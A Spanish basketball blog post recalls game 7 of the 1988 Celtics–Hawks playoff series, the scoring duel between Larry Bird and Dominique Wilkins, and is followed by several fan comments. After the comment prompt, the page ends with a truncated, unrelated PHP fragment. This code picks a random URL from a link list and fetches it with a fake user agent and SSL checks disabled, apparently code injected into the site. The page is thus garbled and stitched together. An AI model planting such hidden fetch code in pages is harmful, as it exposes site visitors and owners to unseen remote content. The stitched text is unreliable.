Bird vs Hawks’88: Shootout alado.

14 de October de 2011 por TheDeerHunter

“It was like two gunfighters waiting to blink. There was one stretch that was as pure a form of basketball as you’re ever going to see.” Kevin McHale.

Dejábamos el otro día nuestra serie de partidos históricos con un duelo antológico de pívots “top10” y hoy la retomamos con un mano a mano entre dos de los mejores aleros de la historia involucrados.

Difícilmente encontraremos otro marco mejor para careos entre aleros míticos que la década de los 80. Entonces estaban habituados a sentarse ante el televisor y encontrarse día sí y día también con enfrentamientos entre los Bird, Worthy, Wilkins, Dantley, Julius Erving, Bernard King, English, Mullin y un largo etcétera. Además de ser la edad de oro de la competición, fue la edad de oro de la posición de 3. No en vano es la columna vertebral de nuestro top 10 histórico.

Nos encontramos ante una serie de gran solera. En aquella época llegó a convertirse en un clásico de la competición, un derbi que en los últimos tiempos ha perdido peso por demérito de ambos (más de unos que de los otros). Curiosamente el ejemplo que os presentamos hoy es a la vez el clímax y el comienzo del fin de esa rivalidad en concreto.

Se trata de uno de esos partidos que hace honor al modo playoffs. El “a vida o muerte” que trasmite ese sentido épico tan particular. Uno de esos momentos que crean afición y fidelizan al espectador. Adicionalmente estamos ante un documento inmejorable para vislumbrar una comparación entre épocas. Esa opinión extendida de que el enfoque físico actual lo hace superior al de otras épocas. Aquello de si McGrady se comería a West…

Pero empecemos por el principio… pero muy al principio de todo. Aunque hoy haya quién no pudiera creerlo hubo un tiempo en el que los Hawks le discutían anillos a los mejores Boston Celtics de la historia. De hecho, Bob Pettit y sus entonces San Luis Hawks son los únicos responsables de que Russell no tenga 12 anillos y que la racha de aquellos Celtics fuera de 8 títulos seguidos en lugar de 10. Conviene recordar que Pettit es otro de los monstruos agraviados por la tiranía de aquellos Celtics, pero de los que menos malparado quedaron. Con 1 anillo y cuatro subcampeonatos se trata de la edad de oro de la franquicia. Nunca se volvió a esas cotas tras medio siglo de competición y parte de culpa la tienen precisamente los Celtics, aunque no toda. En cualquier caso no vamos a hablar hoy de ellos, como alguno quizá está empezando a temer.

En 1968 los Hawks se mudan a Atlanta, pero no es hasta la 70-71 cuando pasan a disputar la conferencia Este. Es por este motivo que la rivalidad queda en paréntesis durante los años 60. Durante los 70 aún se llevarían un par de rejonazos más en primera ronda por parte de Cowens, Hondo y compañía, capítulos añadidos a la leyenda negra de Pistol Pete y a los de la propia franquicia aunque de menor trascendencia y competencia efectiva de lo que cabría esperar. A esas alturas es de suponer que ya se cantaría en Atlanta algo distinto al “Beat L.A.”

Pero lo bueno respecto a lo que nos ocupa empieza a olerse en 1980. Los Celtics draftean a un tal Larry Bird diseñando un equipo a la altura del mito y de la época. En el 82 los Hawks se hacen con Dominique Wilkins y esa misma temporada ya se puede ver la primera eliminatoria 2-1 para los verdes en primera ronda, con un Wilkins aún bisoño frente unos rivales con todo el corazón de campeón que quieras más el anillo en los dedos. Tampoco iban a plantar batalla en el 86, frente unos Celtics en pura efervescencia, a pesar de ser el punto de máximo esplendor anotador de Nique. No suele ser lo mismo construir un equipo campeón en Atlanta que en Boston.

Quizás ocurrió cuando menos se esperaba. Los Hawks habían tocado techo en el 87 con 57 victorias, que no sirvieron más que para volver a caer estrepitosamente, en esta ocasión, contra los Bad Boys. Finalizaban la campaña del 88 con 7 victorias menos y sensaciones bastante desangeladas. El rendimiento decepcionante de Randy Wittman y Antoine Carr, pilares fundamentales el año anterior, no invitaba al optimismo ante el enésimo cruce con su bestia negra. Menos si venían de pasarlas canutas contra los Bucks en primera ronda. La columna vertebral entonces la formaban Wilkins, Kevin Willis y Doc Rivers más una sorprendente gran versión de Spudd Webb en aquella postemporada, muy superior a lo que fue habitualmente  su aportación real.

Los Celtics, imagino que apenas les tendrían en consideración sabiéndose superiores y siempre triunfantes, previsiblemente más concentrados en lo que hacían Lakers o Pistons. Mantenían el bloque compuesto por Bird, McHale, Parish, Ainge y Johnson. ¿Quién no se sabe ese quinteto de memoria?

Se trata de la guardia pretoriana hecha equipo de baloncesto. Sin despeinarse ganaban los dos primeros partidos en casa. Todo parecía indicar que aquella película ya la habíamos visto antes.

Pero mira por donde los Hawks ganan los dos siguientes sin grandes agobios y de postre el 5º en Boston ante la cara de asombro de los más viejos del lugar. Con los Celtics contra las cuerdas tuvieron la ocasión inmejorable de devolvérselas todas juntas en Atlanta, pero perdieron el sexto por dos tristes puntos. El orgullo ‘Celtic’ le llaman algunos. Nada que ver con “flor” ni nada que se le parezca. ¿Podríamos haber elegido aquel choque en Atlanta para esta serie? Nah.

En estas llegamos a la tarde-noche del Domingo, 22 de Mayo de 1988. 7º y definitivo choque. Todo o nada. “Win or go home”. No va más:

Se trata, posiblemente, del intercambio individual de golpes más sensacional que ha habido, sobre todo en el último cuarto. Nada de “Highlight human film”, de efectismos, ni gaitas. Wilkins se mostró eficaz como nunca. 47 imparables puntazos en una increíble serie de 19 de 23. Una de las mejores actuaciones en el filo de la navaja de la historia y, sin duda, la cima de este mito.

Pero si Nique se cargó el equipo a la espalda también lo hizo Bird, como sólo él sabía hacerlo. A falta de 10 minutos, con el partido en el alambre, el ‘Pájaro’ anotó 9 puntos en menos de dos minutos. Aún lograrían rehacerse los Hawks, para terminar con una traca final de 11 puntos casi seguidos por cada una de las dos estrellas.

Pero si los primeras espadas se salieron qué decir de los secundarios. Escándalo de actuación de McHale y Wittman, y también la de Doc Rivers con 16 puntos y nada menos que 18 asistencias. Después terminaría expulsado por faltas y con lágrimas en los ojos.

Nos encantaría soltar otra vez el rollo de que el resultado era lo de menos con un espectáculo tan inmenso, pero es falso. Ganaron los Celtics como casi siempre hicieron en tales circunstancias (aunque en esta ocasión les iba a servir de poco) pero a aquellos Hawks les quedó el castigo del lamento eterno por la oportunidad perdida. Cuando Doc Rivers se cruzaba 20 años más tarde con su ex-franquicia, esta vez como técnico de los Celtics, reconoció no haber podido revisar nunca aquel doloroso partido. No nos extraña, aunque en este caso nosotros tenemos suerte de no ser él.

Comenta

8 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Dios mío, que pedazo de reportaje. Muy bueno, la verdad. Enhorabuena de nuevo Thedeer. Ya decía yo que tardabais en actualizar, estabais cocinando algo excelente, jeje.
    Bueno, 22 de mayo de 1988, a seis días de mi nacimiento, jjeje. A mí me desesperan este tipo de partidos, porque soy apostador y nunca sé por quien meter la pasta. Me pensaba que el tiro a media vuelta de nowitzki era lo mejor que había pasado en la historia del baloncesto, pero estaba totalmente confundido. Ahora al ver al señor Larry he comprendido lo equivocado que estaba. Magnífico el pavo, una precisión de cirujano. Putos celtics, jeej

      Citar

  2. TheDeerHunter dice:
    #2

    No os perdáis el pelotazo que le pegan en toda la jeta a un pollo en el minuto 4:50 del vídeo… ¿y qué me decís del look de Fratello?? XD XD XD

    @Sancho… lo de Bird es una locura. A mí lo que me deja a cuadros es el uso que hace de la izquierda cuando prepara las jugadas
    Por cierto, hasta que se resuelva el lockout haced la cuenta que no actualizaremos diariamente. Tampoco tiene mucho sentido.

      Citar

  3. Sancho88 dice:
    #3

    ahora bien, he de decir que como árbitro me duele ver la jugada del minuto 5:30-6:00, la que repiten muchas veces del 2+1 de Bird. Son pasos hasta en Estados Unidos. También hay por ahí tres o cuatro de estas clarísimas de pasos de salida que si no los pitas en europa te ladran hasta los abuelos, pero ya sé que esos están permitidos allí.
    Comprendemos la no actualización, la pregunta es, tiene algo que hacer el juez federal este del martes?

      Citar

  4. Laker16 dice:
    #4

    Este año he hechado en falta este tipo de elimiantorias. Pienso en el Knicks-Celtics, Heat-Celtics, Heat-Bulls que me parecian emparejamientos muy atractivos pero que en mi opinion tuvieron muy poca historia. Cierto es que este mismo año tenemos el caso de los Grizzlies, que vendieron muy cara su piel. Pero equipos como Celtics y Lakers sobretodo, opino que podrian haber dado bastante mas de si y ofrecernos un gran espectaculo, independientemente de que hubieran sido eliminados. En el caso de Knicks y Bulls pienso que aun les falta algo de solidez y experiencia en Playoffs.

      Citar

  5. Laker16 dice:
    #5

    Bird y Wilkins son dos grandes, pero la cantidad de recursos ofensivos que demuestra Bird son impresionantes, creo que hay es donde marca la diferencia. Pienso que es el mejor 3 de la historia, eso sin tener un gran fisico, algo que aun le da mas merito en mi opinion, ya que la posicion de alero requiere de un gran fisico, solo hay que ver sus rivales historicos en esa posicion. Bird supo compensar cierta “carencia” fisica con una tecnica y lectura de juego practicamente insuperables. Hablar de Bird son palabras mayores.

      Citar

  6. M dice:
    #6

    De acuerdo con Laker16, Bird siempre da la impresión de conocer el juego un poco mejor que sus rivales para suplir sus carencias físicas, y eso hace que uno simpatice mucho con él, o por lo menos, es lo que me pasa a mí.

      Citar

  7. GreenPride dice:
    #7

    Este partido es uno de los más míticos de la historia de la NBA. El último cuarto es, sin lugar a dudas, la batalla entre dos super-estrellas más grande que yo he visto. Los dos tirando de sus equipos. Bird hace 20 puntos en ese último cuarto y Nique 16. Los Celtics compensan con su sabiduría y su corazón la clara inferioridad física ante los exuberantes Hawks y el partido es para verlo una y mil veces. Grandes McHale y Doc Rivers. Lleváis razón en cuanto a Bird, su manejo de la pelota, su forma de pasar y su manejo de ambas manos (era un as con la zurda siendo diestro) le hacen admirable sin tener esas cualidades físicas de otros grandes.
    Sin duda una joya de partido.

      Citar

  8. HisRoyalAirness dice:
    #8

    Es demencial ver a Larry pasando la bola, qué maravilla.
    Habéis hecho una elección estupenda con este partido, es historia pura.

    Sobre el partido y el ultimo cuarto sólo una cosa: Larry Bird. Un tipo cuyo apodo/sobrenombre es “LEGEND”, nada más que decir. Para mí ningún 3 le llega ni a la suela del zapato

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>